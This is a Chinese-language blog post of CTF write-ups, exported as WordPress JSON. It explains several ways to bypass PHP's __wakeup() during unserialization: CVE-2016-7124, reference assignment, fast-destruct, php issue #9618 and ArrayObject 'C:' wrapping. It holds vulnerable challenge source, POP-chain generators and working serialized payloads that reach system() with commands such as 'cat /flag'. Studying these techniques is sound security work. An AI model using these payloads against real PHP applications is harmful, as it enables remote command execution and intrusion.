\u6b63\u5e38\u6765\u8bf4\u5728\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\u4e2d\uff0c\u4f1a\u5148\u8c03\u7528wakeup()\u65b9\u6cd5\u518d\u8fdb\u884cunserilize()\uff0c\u4f46\u5982\u679c\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u4e2d\u8868\u793a\u5bf9\u8c61\u5c5e\u6027\u4e2a\u6570\u7684\u503c\u5927\u4e8e\u771f\u5b9e\u7684\u5c5e\u6027\u4e2a\u6570\u65f6\uff0cwakeup()\u7684\u6267\u884c\u4f1a\u88ab\u8df3\u8fc7\u3002<\/p>\n\n\n\n
\u6bd4\u5982\u653b\u9632\u4e16\u754c\u00b7unserialize3\uff1a<\/p>\n\n\n\n \u53ef\u4ee5\u770b\u5230\u6e90\u7801\u91cc\u6709__wakeup()\uff0c\u5b83\u4f1a\u5728\u6211\u4eec\u53cd\u5e8f\u5217\u5316\u4e4b\u524d\u5c31exit()\uff0c\u7ec8\u6b62\u6211\u4eec\u53cd\u5e8f\u5217\u5316\u7684\u8fdb\u7a0b<\/p>\n\n\n\n \u5982\u679c\u6211\u4eec\u7684payload\u662f\uff1a<\/p>\n\n\n\n \u6beb\u65e0\u7591\u95ee\u7684\u88abexit(‘bad requets’)\u7ec8\u6b62\u4e86\u3002<\/p>\n\n\n\n \u4f46\u8fd9\u4e2a\u9898\u7684\u8003\u70b9\u5c31\u662fcve-2016-7124\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u5229\u7528cve-2016-7124\u8fdb\u884c\u7ed5\u8fc7\uff0c\u5c06payload\u91ccctf\u540e\u9762\u90a3\u4e2a1\u6539\u4e3a2\u5c31\u884c\u4e86\uff0c\u56e0\u4e3a\u771f\u5b9e\u7684\u5c5e\u6027\u5176\u5b9e\u53ea\u6709\u4e00\u4e2a\uff0c\u90a3\u5c31\u662f\u90a3\u4e2aflag\uff0c\u6539\u4e3a2\u4e4b\u540e\u5bf9\u8c61\u5c5e\u6027\u4e2a\u6570\u7684\u503c\u5c31\u5927\u4e8e\u771f\u5b9e\u7684\u5c5e\u6027\u4e2a\u6570\u4e86\uff0c\u56e0\u6b64\u53ef\u4ee5\u7ed5\u8fc7wakeup()\uff0c\u73b0\u5728\u7684payload\u662f\uff1a<\/p>\n\n\n\n \u6210\u529f\u5f97\u5230flag\uff0c\u4e0d\u8fc7\u7b26\u5408\u8fd9\u79cd\u8981\u6c42\u7684php\u7248\u672c\u90fd\u6bd4\u8f83\u8001\u4e86\uff0c\u611f\u89c9\u5b9e\u6218\u4e2d\u5f88\u96be\u51fa\u73b0\u3002<\/p>\n\n\n\n \u5f15\u7528<\/p>\n\n\n\n \u5728php\u91cc\uff0c\u6211\u4eec\u53ef\u4f7f\u7528\u5f15\u7528\u7684\u65b9\u5f0f\u8ba9\u4e24\u4e2a\u53d8\u91cf\u540c\u65f6\u6307\u5411\u540c\u4e00\u4e2a\u5185\u5b58\u5730\u5740\uff0c\u8fd9\u6837\u5bf9\u5176\u4e2d\u4e00\u4e2a\u53d8\u91cf\u64cd\u4f5c\u65f6\uff0c\u53e6\u4e00\u4e2a\u53d8\u91cf\u7684\u503c\u4e5f\u4f1a\u968f\u4e4b\u6539\u53d8\u3002<\/p>\n\n\n\n \u6bd4\u5982\uff1a<\/p>\n\n\n\n \u8f93\u51fa:<\/p>\n\n\n\n \u53ef\u4ee5\u770b\u5230\u8fd9\u91cc\u6211\u4eec\u867d\u7136\u6700\u521d$a=’11’\uff0c\u4f46\u7531\u4e8e\u6211\u4eec\u901a\u8fc7$x=&$a\u4f7f\u4e24\u4e2a\u53d8\u91cf\u540c\u65f6\u6307\u5411\u540c\u4e00\u4e2a\u5185\u5b58\u5730\u5740\u4e86\uff0c\u6240\u4ee5\u4f7f$x=’123’\u4e5f\u5bfc\u81f4$a=’123’\u4e86\u3002<\/p>\n\n\n\n \u4e3e\u4e2a\u4f8b\u5b50\uff1a<\/p>\n\n\n\n \u53ef\u4ee5\u770b\u5230\u5982\u679c\u6211\u4eec\u60f3\u89e6\u53d1echo\u5fc5\u987b\u9996\u5148\u6ee1\u8db3:<\/p>\n\n\n\n \u4e5f\u5c31\u662f\u8bf4\u8981\u4e48\u4e0d\u7ed9wakeup\u8d4b\u503c\uff0c\u8ba9\u5b83\u63a5\u53d7\u4e0d\u5230$this->wakeup\uff0c\u8981\u4e48\u63a7\u5236wakeup\u4e3afalse\uff0c\u4f46\u6211\u4eec\u6ce8\u610f\u5230KeyPort::__wakeup()\uff0c\u8fd9\u91cc\u4f7f$this->wakeup=True;\uff0c\u6211\u4eec\u77e5\u9053\u5728\u7528unserialize()\u53cd\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u65f6\uff0c\u4f1a\u5148\u89e6\u53d1__wakeup()\uff0c\u7136\u540e\u518d\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\uff0c\u6240\u4ee5\u76f8\u5f53\u4e8e\u6211\u4eec\u521a\u8fdb\u884c\u53cd\u5e8f\u5217\u5316$this->wakeup\u5c31\u7b49\u4e8eTrue\u4e86\uff0c\u8fd9\u5c31\u6ca1\u529e\u6cd5\u8fbe\u5230\u6211\u4eec\u63a7\u5236wake\u4e3afalse\u7684\u60f3\u6cd5\u4e86<\/p>\n\n\n\n \u56e0\u6b64\u8fd9\u91cc\u7684\u96be\u70b9\u5176\u5b9e\u5c31\u662f\u8fd9\u4e2awakeup()\u7ed5\u8fc7\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u4e0a\u9762\u63d0\u5230\u8fc7\u7684\u5f15\u7528\u8d4b\u503c\u7684\u65b9\u6cd5\u4ee5\u6b64\u5c06wakeup\u548ckey\u7684\u503c\u8fdb\u884c\u5f15\u7528\uff0c\u8ba9key\u7684\u503c\u6539\u53d8\u7684\u65f6\u5019\u4e5f\u6539\u53d8wakeup\u7684\u503c\u5373\u53ef<\/p>\n\n\n\n 2022\u5e74\u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\u9884\u9009\u8d5b\u91cc\u6709\u9053wakeup\u9898\u5c31\u662f\u8fd0\u7528\u4e86\u8fd9\u4e2a\u77e5\u8bc6\u70b9\uff0c\u5177\u4f53\u53ef\u4ee5\u770b2022\u5e74\u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\u5317\u4eac\u5e02\u9009\u62d4\u8d5b\u66a8\u5168\u56fd\u7ebf\u4e0a\u9884\u9009\u8d5b-Writeup<\/a>\uff0c\u8fd9\u9053\u9898\u7528\u4e86\u5f88\u5de7\u5999\u7684\u65b9\u6cd5\u7ed5\u8fc7\u4e86\u6b7b\u4ea1wakeup\u6700\u540e\u6784\u9020\u4e86\u547d\u4ee4\u3002<\/p>\n\n\n\n \u5f15\u7528\u4e00\u4e0b\u5927\u4f6c\u7684\u89e3\u91ca\uff1a<\/p>\n\n\n\n \u6211\u4eec\u53ef\u4ee5\u770b\u5230DASCTF X GFCTF 2022\u5341\u6708\u6311\u6218\u8d5b\u91ccEasyPOP\u8fd9\u9053\u9898\uff0c\u6e90\u7801\u662f\uff1a<\/p>\n\n\n\n \u53ef\u4ee5\u770b\u5230\u8fd9\u91cc\u6709\u4e2a\u96be\u70b9\u5c31\u662fwakeup\u7684\u7ed5\u8fc7\uff1a<\/p>\n\n\n\n exp:<\/p>\n\n\n\n \u76f4\u63a5\u4f20\u8fdb\u53bb\u6beb\u65e0\u7591\u95ee\u4f1a\u56e0\u4e3adie()\u800c\u7ec8\u6b62\uff0c\u8fd9\u91cc\u6211\u4eec\u5c31\u53ef\u4ee5\u7528fast-destruct\u8fd9\u4e2a\u6280\u5de7\u4f7fdestruct\u63d0\u524d\u53d1\u751f\u4ee5\u7ed5\u8fc7wakeup()\uff0c\u6bd4\u5982\u6211\u4eec\u53ef\u4ee5\u51cf\u5c11\u4e00\u4e2a} \uff1a<\/p>\n\n\n\n \u6216\u8005\u5728r;10;\u540e\u9762\u52a0\u4e00\u4e2a1\uff1a<\/p>\n\n\n\n \u90fd\u53ef\u4ee5\u5b9e\u73b0wakeup\u7ed5\u8fc7<\/p>\n\n\n\n php issue#9618<\/a>\u63d0\u5230\u4e86\u6700\u65b0\u7248wakeup()\u7684\u4e00\u79cdbug\uff0c\u53ef\u4ee5\u901a\u8fc7\u5728\u53cd\u5e8f\u5217\u5316\u540e\u7684\u5b57\u7b26\u4e32\u4e2d\u5305\u542b\u5b57\u7b26\u4e32\u957f\u5ea6\u9519\u8bef\u7684\u53d8\u91cf\u540d\u4f7f\u53cd\u5e8f\u5217\u5316\u5728__wakeup\u4e4b\u524d\u8c03\u7528__destruct()\u51fd\u6570\uff0c\u6700\u540e\u7ed5\u8fc7__wakeup()\uff0c\u7248\u672c\uff1a<\/p>\n\n\n\n \u672c\u5730\u8d77\u4e00\u4e2a\u73af\u5883\uff1a<\/p>\n\n\n\n payload\uff1a<\/p>\n\n\n\n \u6210\u529f\u7ed5\u8fc7wakeup<\/p>\n\n\n\n \u539f\u7406\uff1a<\/strong>\u58f0\u660e\u7684\u5b57\u6bb5\u4e3a\u4fdd\u62a4\u5b57\u6bb5\uff0c\u5728\u6240\u58f0\u660e\u7684\u7c7b\u548c\u8be5\u7c7b\u7684\u5b50\u7c7b\u4e2d\u53ef\u89c1\uff0c\u4f46\u5728\u8be5\u7c7b\u7684\u5bf9\u8c61\u5b9e\u4f8b\u4e2d\u4e0d\u53ef\u89c1\u3002\u56e0\u6b64\u4fdd\u62a4\u5b57\u6bb5\u7684\u5b57\u6bb5\u540d\u5728\u5e8f\u5217\u5316\u65f6\uff0c\u5b57\u6bb5\u540d\u524d\u9762\u4f1a\u52a0\u4e0a \u53ef\u4ee5\u770b\u5230\u79c1\u6709\u5c5e\u6027Aend\u90a3\u91ccA\u7684\u524d\u540e\u4e24\u8fb9\u90fd\u51fa\u73b0\u4e86\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u800c\u6211\u4eec\u4f20\u5165\u4ee5\u53ca\u670d\u52a1\u5668\u63a5\u53d7\u7684payload\u5b9e\u9645\u4e0a\u4e3aO:1:”A”:2:{s:4:”info”;O:1:”B”:1:{s:3:”znd”;N;}s:6:”Aend”;s:1:”1″;}\uff0c\u8fd9\u5c31\u5bfc\u81f4\u7406\u8bba\u4e0aAend\u957f\u5ea6\u4e3a6\u4f46\u5b9e\u9645\u4e0a\u4e0d\u662f\uff0c\u6700\u540e\u5bfc\u81f4wakeup()\u7ed5\u8fc7\uff0c\u539f\u7406\u5e94\u8be5\u548cfast-destruct\u76f8\u4f3c\uff1a<\/p>\n\n\n\n \u4f46\u4e8b\u5b9e\u4e0a\u53ea\u6709\u8fd9\u79cd\u60c5\u51b5\u80fd\u591f\u7ed5\u8fc7wakeup\uff0c\u4e5f\u5c31\u662fdestruct\u548cwakeup\u5728\u4e0d\u540c\u7684\u7c7b\u7684\u65f6\u5019\uff0c\u5982\u679c\u4ed6\u4eec\u5b58\u5728\u540c\u4e00\u4e2a\u7c7b\u65f6\u8f93\u5165\u76f4\u63a5serialize\u5f97\u5230\u7684payload\u662f\u6ca1\u6709\u56de\u663e\u7684\uff1a<\/p>\n\n\n\n \u53ea\u6709\u5f53\u6211\u4eec\u7528 \u4f60\u8fd9\u65f6\u4e0d\u96be\u60f3\u5230\u5982\u679c\u7ed9\u6700\u521ddestruct\u548cwakeup\u4e0d\u540c\u7c7b\u7684payload\u52a0\u4e0a%00\u4f1a\u600e\u4e48\u6837\u5462\uff0c\u7b54\u6848\u662f\u8fd9\u79cd\u60c5\u51b5\u4e0b\u5c31\u4f1a\u6b63\u5e38\u53cd\u5e8f\u5217\u5316\uff0c\u4e0d\u80fd\u7ed5\u8fc7wakeup\u4e86<\/p>\n\n\n\n \u611f\u89c9\u8fd8\u662f\u548cfast-destruct\u4ee5\u53caphp\u7684GC\u56de\u6536\u7684\u7b97\u6cd5\u6709\u5173\uff0c\u4e0d\u60f3\u7814\u7a76\u4e86\uff0c\u6446\u4e86<\/p>\n\n\n\n \u633a\u65e9\u4e4b\u524d\u6211\u5c31\u77e5\u9053\u4f7f\u7528C\u4ee3\u66ffO\u80fd\u7ed5\u8fc7wakeup\uff0c\u4f46\u90a3\u6837\u7684\u8bdd\u53ea\u80fd\u6267\u884cconstruct()\u51fd\u6570\u6216\u8005destruct()\u51fd\u6570\uff0c\u65e0\u6cd5\u6dfb\u52a0\u4efb\u4f55\u5185\u5bb9\uff0c\u8fd9\u6b21\u6bd4\u8d5b\u5b66\u5230\u4e86\u79cd\u65b0\u65b9\u6cd5\uff0c\u5c31\u662f\u628a\u6b63\u5e38\u7684\u53cd\u5e8f\u5217\u5316\u8fdb\u884c\u4e00\u6b21\u6253\u5305\uff0c\u8ba9\u6700\u540e\u751f\u6210\u7684payload\u4ee5C\u5f00\u5934\u5373\u53ef<\/p>\n\n\n\n \u6211\u4eec\u628aO\u6539\u6210C\u4f20\u5165C:7:”ctfshow”:0:{}\u53ef\u4ee5\u770b\u5230\u7f51\u9875\u663e\u793abypass<\/p>\n\n\n\n \u4f46\u4f60\u53ea\u80fd\u8fd9\u4e48\u4f20\u5165\uff0c\u7a0d\u5fae\u6539\u4e00\u70b9\u5c31\u6ca1\u53cd\u5e94\u4e86\uff0c\u66f4\u522b\u8bf4\u5411\u91cc\u9762\u4f20\u503c\u4e86\uff0c\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528ArrayObject\u5bf9\u6b63\u5e38\u7684\u53cd\u5e8f\u5217\u5316\u8fdb\u884c\u4e00\u6b21\u5305\u88c5\uff0c\u8ba9\u6700\u540e\u8f93\u51fa\u7684payload\u4ee5C\u5f00\u5934(\u5b98\u65b9\u6587\u6863\u8bf4\uff1aThis class allows objects to work as arrays.)<\/p>\n\n\n\n \u6700\u540e\u6210\u529f\u547d\u4ee4\u6267\u884c<\/p>\n\n\n\n \u4f46\u6211\u672c\u5730\u5c1d\u8bd5\u7684\u65f6\u5019\u53d1\u73b0\u8fd9\u79cd\u5305\u88c5\u65b9\u6cd5\u5bf9php\u7248\u672c\u6709\u8981\u6c42\uff0c\u6211\u75287.3.4\u624d\u53ef\u4ee5\u8f93\u51fa\u4ee5C\u5f00\u5934\u7684payload\uff0c\u63627.4\u6216\u80058.0\u8f93\u51fa\u7684\u5c31\u662fO\u5f00\u5934\u4e86\uff0c\u9664\u4e86\u8fd9\u4e2a\u51fd\u6570\u8fd8\u6709\u5176\u4ed6\u65b9\u6cd5\u53ef\u4ee5\u5bf9payload\u8fdb\u884c\u5305\u88c5\uff0c\u5177\u4f53\u53ef\u4ee5\u53c2\u8003\u611a\u4eba\u676f3rd [easy_php]<\/a>\uff1a<\/p>\n\n\n\n \u5b9e\u73b0\u4e86unserialize\u63a5\u53e3\u7684\u5927\u6982\u7387\u662fC\u6253\u5934\uff0c\u7ecf\u8fc7\u6240\u6709\u6d4b\u8bd5\u53d1\u73b0\u53ef\u4ee5\u7528\u7684\u7c7b\u4e3a\uff1a<\/p>\n\n\n\n cve-2016-7124 \u5f71\u54cd\u8303\u56f4\uff1a \u6b63\u5e38\u6765\u8bf4\u5728\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\u4e2d\uff0c\u4f1a\u5148\u8c03\u7528wakeup()\u65b9\u6cd5\u518d\u8fdb\u884cunser […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1187","post","type-post","status-publish","format-standard","hentry","category-1"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1187","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=1187"}],"version-history":[{"count":6,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1187\/revisions"}],"predecessor-version":[{"id":1346,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1187\/revisions\/1346"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=1187"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=1187"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=1187"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/03\/image.png\")
<\/div><\/figure>\n\n\n\n<?php\nclass xctf{\npublic $flag = '111';\npublic function __wakeup(){\n \n}\n}\n$a = new xctf();\nprint(serialize($a));\n#O:4:\"xctf\":1:{s:4:\"flag\";s:3:\"111\";} \n?> \n<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/03\/image-1.png\")
<\/div><\/figure>\n\n\n\nO:4:\"xctf\":2:{s:4:\"flag\";s:3:\"111\";}<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/03\/image-2.png\")
<\/div><\/figure>\n\n\n\nphp\u5f15\u7528\u8d4b\u503c&<\/h1>\n\n\n\n
<?php\nfunction test (&$a){\n $x=&$a;\n $x='123';\n}\n$a='11';\ntest($a);\necho $a;<\/code><\/pre>\n\n\n\n123<\/code><\/pre>\n\n\n\n<?php\n\nclass KeyPort{\n public $key;\n\n public function __destruct()\n {\n $this->key=False;\n if(!isset($this->wakeup)||!$this->wakeup){\n echo \"You get it!\";\n }\n }\n\n public function __wakeup(){\n $this->wakeup=True;\n }\n\n}\n\nif(isset($_POST['pop'])){\n\n @unserialize($_POST['pop']);\n\n}<\/code><\/pre>\n\n\n\nif(!isset($this->wakeup)||!$this->wakeup)<\/code><\/pre>\n\n\n\n<?php\n\nclass KeyPort{\n public $key;\n\n public function __destruct()\n {\n }\n\n}\n\n$keyport = new KeyPort();\n$keyport->key=&$keyport->wakeup;\necho serialize($keyport); \n#O:7:\"KeyPort\":2:{s:3:\"key\";N;s:6:\"wakeup\";R:2;}\n<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/03\/1-23.jpg\")
<\/div><\/figure>\n\n\n\nfast-destruct<\/h1>\n\n\n\n
\n
unserialize()<\/code>\u51fd\u6570\uff0c\u5219\u53cd\u5e8f\u5217\u5316\u540e\u5f97\u5230\u7684\u751f\u547d\u5468\u671f\u4ec5\u9650\u4e8e\u8fd9\u4e2a\u51fd\u6570\u6267\u884c\u7684\u751f\u547d\u5468\u671f\uff0c\u5728\u6267\u884c\u5b8cunserialize()\u51fd\u6570\u65f6\u5c31\u4f1a\u6267\u884c__destruct()<\/code>\u65b9\u6cd5<\/li>\n\n\n\nunserialize()<\/code>\u51fd\u6570\u6267\u884c\u540e\u5f97\u5230\u7684\u5b57\u7b26\u4e32\u8d4b\u503c\u7ed9\u4e86\u4e00\u4e2a\u53d8\u91cf\uff0c\u5219\u53cd\u5e8f\u5217\u5316\u7684\u5bf9\u8c61\u7684\u751f\u547d\u5468\u671f\u5c31\u4f1a\u53d8\u957f\uff0c\u4f1a\u4e00\u76f4\u5230\u5bf9\u8c61\u88ab\u9500\u6bc1\u624d\u6267\u884c\u6790\u6784\u65b9\u6cd5<\/li>\n<\/ul>\n\n\n\n<?php\nhighlight_file(__FILE__);\nerror_reporting(0);\n\nclass fine\n{\n private $cmd;\n private $content;\n\n public function __construct($cmd, $content)\n {\n $this->cmd = $cmd;\n $this->content = $content;\n }\n\n public function __invoke()\n {\n call_user_func($this->cmd, $this->content);\n }\n\n public function __wakeup()\n {\n $this->cmd = \"\";\n die(\"Go listen to Jay Chou's secret-code! Really nice\");\n }\n}\n\nclass show\n{\n public $ctf;\n public $time = \"Two and a half years\";\n\n public function __construct($ctf)\n {\n $this->ctf = $ctf;\n }\n\n\n public function __toString()\n {\n return $this->ctf->show();\n }\n\n public function show(): string\n {\n return $this->ctf . \": Duration of practice: \" . $this->time;\n }\n\n\n}\n\nclass sorry\n{\n private $name;\n private $password;\n public $hint = \"hint is depend on you\";\n public $key;\n\n public function __construct($name, $password)\n {\n $this->name = $name;\n $this->password = $password;\n }\n\n public function __sleep()\n {\n $this->hint = new secret_code();\n }\n\n public function __get($name)\n {\n $name = $this->key;\n $name();\n }\n\n\n public function __destruct()\n {\n if ($this->password == $this->name) {\n\n echo $this->hint;\n } else if ($this->name = \"jay\") {\n secret_code::secret();\n } else {\n echo \"This is our code\";\n }\n }\n\n\n public function getPassword()\n {\n return $this->password;\n }\n\n public function setPassword($password): void\n {\n $this->password = $password;\n }\n\n\n}\n\nclass secret_code\n{\n protected $code;\n\n public static function secret()\n {\n include_once \"hint.php\";\n hint();\n }\n\n public function __call($name, $arguments)\n {\n $num = $name;\n $this->$num();\n }\n\n private function show()\n {\n return $this->code->secret;\n }\n}\n\n\nif (isset($_GET['pop'])) {\n $a = unserialize($_GET['pop']);\n $a->setPassword(md5(mt_rand()));\n} else {\n $a = new show(\"Ctfer\");\n echo $a->show();\n}\n<\/code><\/pre>\n\n\n\n public function __wakeup()\n {\n $this->cmd = \"\";\n die(\"Go listen to Jay Chou's secret-code! Really nice\");\n }<\/code><\/pre>\n\n\n\n<?php\nclass sorry\n{\n public $name;\n public $password;\n public $key;\n public $hint;\n}\n\nclass show\n{\n public $ctf;\n\n}\nclass secret_code\n{\n public $code;\n}\n\nclass fine\n{\n public $cmd;\n public $content;\n public function __construct()\n {\n $this->cmd = 'system';\n $this->content = ' \/';\n }\n}\n\n$a=new sorry();\n$b=new show();\n$c=new secret_code();\n$d=new fine();\n$a->hint=$b;\n$b->ctf=$c;\n$e=new sorry();\n$e->hint=$d;\n$c->code=$e;\n$e->key=$d;\necho (serialize($a));\n#O:5:\"sorry\":4:{s:4:\"name\";N;s:8:\"password\";N;s:3:\"key\";N;s:4:\"hint\";O:4:\"show\":1:{s:3:\"ctf\";O:11:\"secret_code\":1:{s:4:\"code\";O:5:\"sorry\":4:{s:4:\"name\";N;s:8:\"password\";N;s:3:\"key\";O:4:\"fine\":2:{s:3:\"cmd\";s:6:\"system\";s:7:\"content\";s:2:\" \/\";}s:4:\"hint\";r:10;}}}}<\/code><\/pre>\n\n\n\n?pop=O:5:\"sorry\":4:{s:4:\"name\";N;s:8:\"password\";N;s:3:\"key\";N;s:4:\"hint\";O:4:\"show\":1:{s:3:\"ctf\";O:11:\"secret_code\":1:{s:4:\"code\";O:5:\"sorry\":4:{s:4:\"name\";N;s:8:\"password\";N;s:3:\"key\";O:4:\"fine\":2:{s:3:\"cmd\";s:6:\"system\";s:7:\"content\";s:9:\"cat \/flag\";}s:4:\"hint\";r:10;}}}\n<\/code><\/pre>\n\n\n\n?pop=O:5:\"sorry\":4:{s:4:\"name\";N;s:8:\"password\";N;s:3:\"key\";N;s:4:\"hint\";O:4:\"show\":1:{s:3:\"ctf\";O:11:\"secret_code\":1:{s:4:\"code\";O:5:\"sorry\":4:{s:4:\"name\";N;s:8:\"password\";N;s:3:\"key\";O:4:\"fine\":2:{s:3:\"cmd\";s:6:\"system\";s:7:\"content\";s:9:\"cat \/flag\";}s:4:\"hint\";r:10;1}}}}<\/code><\/pre>\n\n\n\nphp issue#9618<\/h1>\n\n\n\n
\n
<?php\nhighlight_file(__FILE__);\nclass A\n{\n public $info;\n private $end = \"1\";\n\n public function __destruct()\n {\n $this->info->func();\n echo \"des\";\n }\n}\n\nclass B\n{\n public $znd;\n\n public function __wakeup()\n {\n $this->znd = \"exit();\";\n echo '__wakeup';\n }\n \n public function __call($method, $args)\n {\n echo \"__call \";\n }\n}\nif(isset($_POST['pop'])){\n @unserialize($_POST['pop']);\n}<\/code><\/pre>\n\n\n\n<?php\nclass A\n{\n public $info;\n private $end = \"1\";\n\n public function __destruct()\n {\n }\n}\n\nclass B\n{\n public $znd;\n\n public function __wakeup()\n {\n\n }\n \n public function __call($method, $args)\n {\n }\n}\n$test=new A();\n$test->info=new B();\necho serialize($test);\n#O:1:\"A\":2:{s:4:\"info\";O:1:\"B\":1:{s:3:\"znd\";N;}s:6:\"Aend\";s:1:\"1\";}<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/03\/1-22.jpg\")
<\/div><\/figure>\n\n\n\n\\0*\\0<\/code>\u7684\u524d\u7f00\u3002\u8fd9\u91cc\u7684\\0 \u8868\u793a ASCII \u7801\u4e3a 0 \u7684\u5b57\u7b26(\u4e0d\u53ef\u89c1\u5b57\u7b26)\uff0c\u800c\u4e0d\u662f \\0 \u7ec4\u5408\u3002\u4e5f\u5c31\u662f\u8bf4\u5f53\u5b9e\u4f8b\u5316\u7684\u7c7b\u91cc\u5b58\u5728\u79c1\u6709\u5c5e\u6027\u65f6\u6bd4\u5982private\u65f6\uff0c\u5e8f\u5217\u5316\u5b83\u65f6\u4f1a\u51fa\u73b0\u5b57\u7b26\u957f\u5ea6\u90a3\u91cc\u4f1a\u51fa\u73b0\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u6bd4\u5982\uff1a<\/p>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-1-1024x360.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-2.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-3.png\")
<\/div><\/figure>\n\n\n\n%00<\/code>\u4ee3\u66ff\u4e0d\u53ef\u89c1\u5b57\u7b26\u65f6\uff0c\u624d\u4f1a\u8fdb\u884c\u6b63\u5e38\u7684\u53cd\u5e8f\u5217\u5316\u8f93\u51fa\uff0c\u4f46\u5374\u662f\u6309\u6b63\u5e38\u987a\u5e8f\u8f93\u51fa\u7684wakeup\u5e76\u4e0d\u4f1a\u88ab\u7ed5\u8fc7<\/p>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-4.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-5-1024x792.png\")
<\/div><\/figure>\n\n\n\n\u4f7f\u7528C\u7ed5\u8fc7<\/h1>\n\n\n\n
<?php\nerror_reporting(0);\nhighlight_file(__FILE__);\n\nclass ctfshow{\n\n public function __wakeup(){\n die(\"not allowed!\");\n }\n\n public function __destruct(){\n system($this->ctfshow);\n }\n\n}\n\n$data = $_GET['1+1>2'];\n\nif(!preg_match(\"\/^[Oa]:[\\d]+\/i\", $data)){\n unserialize($data);\n}\n\n\n?><\/code><\/pre>\n\n\n\n<?php\nclass ctfshow{\n\n public function __wakeup(){\n die(\"not allowed!\");\n }\n\n public function __destruct(){\n system($this->ctfshow);\n }\n\n} \n$a=new ctfshow();\necho serialize($a);\n#O:7:\"ctfshow\":0:{}<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-6.png\")
<\/div><\/figure>\n\n\n\n<?php\n\nclass ctfshow {\n public $ctfshow;\n\n public function __wakeup(){\n die(\"not allowed!\");\n }\n\n public function __destruct(){\n echo \"OK\";\n system($this->ctfshow);\n }\n \n\n}\n$a=new ctfshow;\n$a->ctfshow=\"whoami\";\n$arr=array(\"evil\"=>$a);\n$oa=new ArrayObject($arr);\n$res=serialize($oa);\necho $res;\n\/\/unserialize($res)\n?>\n#C:11:\"ArrayObject\":77:{x:i:0;a:1:{s:4:\"evil\";O:7:\"ctfshow\":1:{s:7:\"ctfshow\";s:6:\"whoami\";}};m:a:0:{}}<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-7-1024x565.png\")
<\/div><\/figure>\n\n\n\n\n
\n